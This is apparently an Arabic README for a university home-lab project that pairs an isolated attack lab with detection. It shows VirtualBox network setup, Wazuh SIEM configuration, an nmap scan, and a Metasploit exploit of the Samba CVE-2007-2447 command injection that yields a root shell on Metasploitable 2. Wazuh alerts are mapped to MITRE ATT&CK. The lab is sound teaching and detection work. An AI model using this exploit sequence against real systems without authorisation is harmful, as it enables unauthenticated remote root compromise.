
مختبر هجمات معزول لـ AD/Linux: تم استغلال CVE-2007-2447 عبر Metasploit، وتم اكتشافه باستخدام Wazuh SIEM المرتبط بـ MITRE ATT&CK (T1190, T1059)
مشروع بكالوريوس التقنية (BTP) | IIIT Pune استنادًا إلى: "Designing and Implementing an Effective Cybersecurity Home Lab for Detection and Monitoring" — ICCCNT 2023، IIT Delhi
مختبر منزلي متكامل للأمن السيبراني مبني على جهاز واحد باستخدام أدوات مجانية ومفتوحة المصدر. يحاكي المختبر دورة حياة هجوم واقعية — الاستطلاع ← الاستغلال ← الكشف — ويوضح كيف يمكن لنظام SIEM اكتشاف الهجمات وربطها بإطار عمل MITRE ATT&CK في الوقت الفعلي.
┌─────────────────────────────────────────────────┐
│ VirtualBox — Internal Network │
│ (cyberlab, 10.0.0.x/24) │
│ │
│ ┌──────────┐ ┌──────────────┐ ┌──────────┐ │
│ │ Kali │ │ Metasploitable│ │ Ubuntu │ │
│ │ 10.0.0.1 │◄─►│ 10.0.0.2 │◄─►│ 10.0.0.3 │ │
│ │ ATTACKER │ │ VICTIM │ │ SIEM │ │
│ └──────────┘ └──────────────┘ └──────────┘ │
└─────────────────────────────────────────────────┘
Host-Only Adapter (192.168.56.103)
→ Wazuh Dashboard access from browser
| VM | الدور | IP | الأدوات |
|---|---|---|---|
| Kali Linux 2026.1 | المهاجم | 10.0.0.1 | Nmap, Metasploit |
| Metasploitable 2 | الضحية | 10.0.0.2 | أكثر من 20 ثغرة |
| Ubuntu 22.04 + Wazuh | SIEM | 10.0.0.3 | Wazuh v4.7.5 |
أنشئ شبكة داخلية باسم cyberlab في VirtualBox. تحصل الأجهزة الافتراضية الثلاثة على هذا المحول. يحصل جهاز Ubuntu/Wazuh الافتراضي على محول Host-Only إضافي حتى تتمكن من الوصول إلى لوحة التحكم من متصفحك.
cyberlab# Edit /etc/network/interfaces
auto eth0
iface eth0 inet static
address 10.0.0.1
netmask 255.255.255.0
sudo systemctl restart networkingcyberlab# Edit /etc/network/interfaces
auto eth0
iface eth0 inet static
address 10.0.0.2
netmask 255.255.255.0
⚠️ لا تعرّض Metasploitable 2 للإنترنت أبدًا. فهو غير آمن عمدًا.
cyberlab داخلي + Host-Only/etc/netplan/01-network-manager-all.yaml):network:
version: 2
renderer: NetworkManager
ethernets:
enp0s3:
addresses:
- 10.0.0.3/24
enp0s8:
dhcp4: true
curl -sO https://packages.wazuh.com/4.7/wazuh-install.sh
sudo bash wazuh-install.sh -a
https://192.168.56.103 (من متصفح المضيف)نظرًا لأن Metasploitable 2 لا يمكنه تشغيل وكيل Wazuh، قم بتهيئة إعادة توجيه syslog للمراقبة بدون وكيل:
على Metasploitable، أضف إلى /etc/rsyslog.conf:
*.* @10.0.0.3:514
على Wazuh (Ubuntu)، فعّل إدخال syslog في /var/ossec/etc/ossec.conf:
<remote>
<connection>syslog</connection>
<port>514</port>
<protocol>udp</protocol>
</remote>
أعد تشغيل Wazuh: sudo systemctl restart wazuh-manager
# From Kali
nmap -sV -O 10.0.0.2
الخدمات الرئيسية المكتشفة على Metasploitable 2:
تم اكتشاف أكثر من 20 منفذًا مفتوحًا. تم تحديد نظام التشغيل: Linux 2.6.x
الثغرة: CVE-2007-2447 — حقن أوامر Samba usermap_script
تسمح بتنفيذ كود عن بُعد دون مصادقة عبر طلبات MS-RPC غير صالحة على Samba 3.0.0–3.0.25rc3.
# From Kali — launch Metasploit
msfconsole
# Inside Metasploit
use exploit/multi/samba/usermap_script
set RHOSTS 10.0.0.2
set LHOST 10.0.0.1
run
# Verify root access
whoami
# Output: root
بعد الاستغلال، اكتشف Wazuh الأحداث تلقائيًا وربطها بـ MITRE ATT&CK:
إجمالي الأحداث المكتشفة: أكثر من 55 حدثًا
يمكنك الوصول إلى لوحة التحكم على https://192.168.56.103 ← Security Events ← MITRE ATT&CK
cybersecurity-home-lab/
│
├── README.md ← You are here
├── network-config/
│ ├── kali-interfaces.txt ← Kali static IP config
│ ├── metasploitable-interfaces.txt
│ └── ubuntu-netplan.yaml ← Ubuntu/SIEM netplan config
├── wazuh-config/
│ └── ossec.conf ← Wazuh syslog/agent config
├── screenshots/
│ ├── nmap-scan.png
│ ├── metasploit-exploit.png
│ ├── wazuh-dashboard.png
│ └── wazuh-alerts-table.png
└── report/
└── ICCCNT_2023_paper.pdf ← Reference research paper
Dadiyala, C. et al. (2023). Designing and Implementing an Effective Cybersecurity Home Lab for Detection and Monitoring. 14th International Conference on Computing, Communication and Networking Technologies (ICCCNT), IIT Delhi. IEEE-56998.
تم بناء هذا المختبر بالكامل على أجهزة افتراضية معزولة دون أي وصول إلى الإنترنت أثناء محاكاة الهجمات. تُستخدم جميع الأدوات والتقنيات لأغراض تعليمية فقط ضمن بيئة خاضعة للتحكم. لا تحاول تكرار أي تقنيات هجوم على أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.
مقدَّم من Harshita Verma | IIIT Pune
| الأداة | الإصدار | الغرض |
|---|
| VirtualBox | 7.x | برنامج تشغيل افتراضي — يشغّل جميع الأجهزة الافتراضية على مضيف واحد |
| Kali Linux | 2026.1 | نظام تشغيل لاختبار الاختراق (هجومي) |
| Metasploitable 2 | v2.0 | هدف معرّض للثغرات عمدًا |
| Wazuh | v4.7.5 | نظام SIEM مفتوح المصدر (دفاعي) |
| Nmap | الأحدث | فحص الشبكة/المنافذ |
| Metasploit Framework | الأحدث | إطار عمل للاستغلال |
| المنفذ | الخدمة | الإصدار |
|---|
| 21/tcp | FTP | vsftpd 2.3.4 |
| 22/tcp | SSH | OpenSSH 4.7p1 |
| 80/tcp | HTTP | Apache 2.2.8 |
| 139/445 | SMB | Samba 3.x–4.x |
| 3306/tcp | MySQL | 5.0.51a |
| 5432/tcp | PostgreSQL | 8.3 |
| معرّف القاعدة | الوصف | تقنية MITRE | التكتيك |
|---|
| 5402 | تنفيذ ناجح لـ sudo إلى ROOT | T1548.003 | تصعيد الامتيازات |
| 5501 | PAM: فتح جلسة تسجيل دخول | T1078 | وصول أولي / استمرارية |
| 5502 | PAM: إغلاق جلسة تسجيل دخول | T1078 | مراوغة الدفاعات |
| 502 | بدء تشغيل خادم Wazuh | — | الكشف نشط |